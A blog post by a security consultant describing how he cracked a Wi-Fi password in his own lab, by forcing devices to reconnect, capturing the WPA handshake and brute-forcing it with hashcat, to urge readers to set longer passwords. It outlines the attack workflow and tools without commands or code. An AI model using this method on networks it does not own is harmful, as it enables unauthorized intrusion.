When’s the last time you changed your Wi-Fi password? Perhaps you’re among many who have never thought to. When you signed up for Internet service, did you have the technician set up your modem for you? If so, your Wi-Fi password is probably way too short to be secure.

tl;dr: If your Wi-Fi password hasn’t been changed for years or it’s < 12 characters long, go change it. NOW.

How do I know this? I’ve been working on a book all about cybersecurity. As part of my research I looked into Wi-Fi security. I was stunned by what I found. And tried. In fact, it’s caused me to change a lot of my security policies at my business and at home.

In this post, I’m going to show you just how simple it was to crack a Wi-Fi password in my lab.

Exciting Shameless Plug: I’ve written a book on cybersecurity for business owners called Beyond Passwords: Secure Your Business. You can pre-order it at https://www.beyondpasswordsbook.com.

WARNING: This post is for educational purposes only. Cracking someone else’s Wi-Fi password without their permission may be a criminal offense depending on where you live. I’m not responsible for the misuse of this information.

The Tools

  • Lenovo Thinkpad T440s running Kali Linux.
  • My beefy desktop computer with an Nvidia 1080ti GPU running Windows 10.
  • A wi-fi router.

…and that’s it. Seriously. No crazy tools required for this attack. I executed the entire attack with two computers. Note that everything described in this post was done in my laboratory under controlled conditions. I own all the equipment.

Let me explain the scenario.

The Setup: an adversary wants to get your Wi-Fi password. They can’t get into your premises, but they are close enough to pick up your Wi-Fi signal. (Sidenote: attackers can do this from up to 5 miles away.) They use a laptop computer to listen on your password-protected (encrypted) Wi-Fi data. Using a special tool, they’ll force everyone on the Wi-Fi to disconnect and reconnect. This is when each device does a “handshake” with the Wi-Fi access point. The adversary spies on this handshake and captures it. This handshake contains an encrypted version of the Wi-Fi password.

The Hack: the adversary sends that encrypted password back to a computer (or botnet) they own to crack it. Laptops are generally too weak to do this in the field. With a powerful computer, they start guessing passwords.

Wi-Fi password cracking is tough. In the past, it would take months to crack even a simple password, as computers could only guess a few hundred passwords per second.

With even a modest Graphics Processing Unit, this can be sped up to over 100,000 passwords per second. My machine was capable of an average of 270,000 password guesses per second.

The Attack: with the password cracked, the attacker can now connect to your Wi-Fi. From there, they can search for vulnerable computers, listen to your previously encrypted traffic, and much more. You’re now vulnerable to attack.

In my scenario, I set up a wireless access point called “hackme” with password “95816781“. Not strong, but many routers are set up by default with a short 8-9 character password.

Once I spied on this network and forced all the devices (laptops, cellphones) to reconnect, I was able to grab the encrypted handshake. From there, I took that to my desktop computer and ran a tool called hashcat, which allowed me to crack this password on my computer’s graphics card.

I limited the range of guesses to all 8-digit numbers (00000000 through 99999999). After 4 minutes and 29 seconds… success.

Hacked.png

Oh. Crap. Remember, I’m doing all of this on modest hardware. A dedicated attacker could easily use the power of the cloud to fire up a lot of machines at once to do this cracking.

My old Bell modem shipped with a very predictable Wi-Fi password – 8 characters, either uppercase letters (A-F) and numbers (0-9). That’s only around 4.3 million combinations of passwords. At 270,000 guesses a second, at worst an attacker could get that password in 15,907 seconds, 265 minutes, or 4.4 hours.

If your Wi-Fi password is 8 characters, it’s too short.

Remember: if an attacker can get into your network, you’re in huge trouble. They can snoop your data, search for vulnerabilities, and cause plenty of havoc.

Sources:

Crack WPA/WPA2 Wi-Fi Routers with Aircrack-ng and Hashcat

WPA2 Cracking Using Hashcat

Published by Elias Puurunen

Elias Puurunen is a versatile entrepreneur and President of Northern HCI Solutions Inc., an IT consulting firm which has worked with Fortune 500 companies, governments, and startups. He has spoken at conferences in Canada and the United States and has been published around the world. Part of his work led to an agreement between the Canadian Government and Siemens Canada, creating jobs and investment into green infrastructure. His company's event management app, the Tractus Event Passport connects people at conferences, seminars and symposiums across Canada. Today he is a consultant and advisor to technology firms and government organizations. He lectures at the University of Waterloo on Coding for Policy Analysis for the School of Public Policy. He is the author of Beyond Passwords: Secure Your Business, a cyber-security book for small business owners.

Leave a comment

Fill in your details below or click an icon to log in:

Gravatar
WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Cancel

Connecting to %s

%d bloggers like this: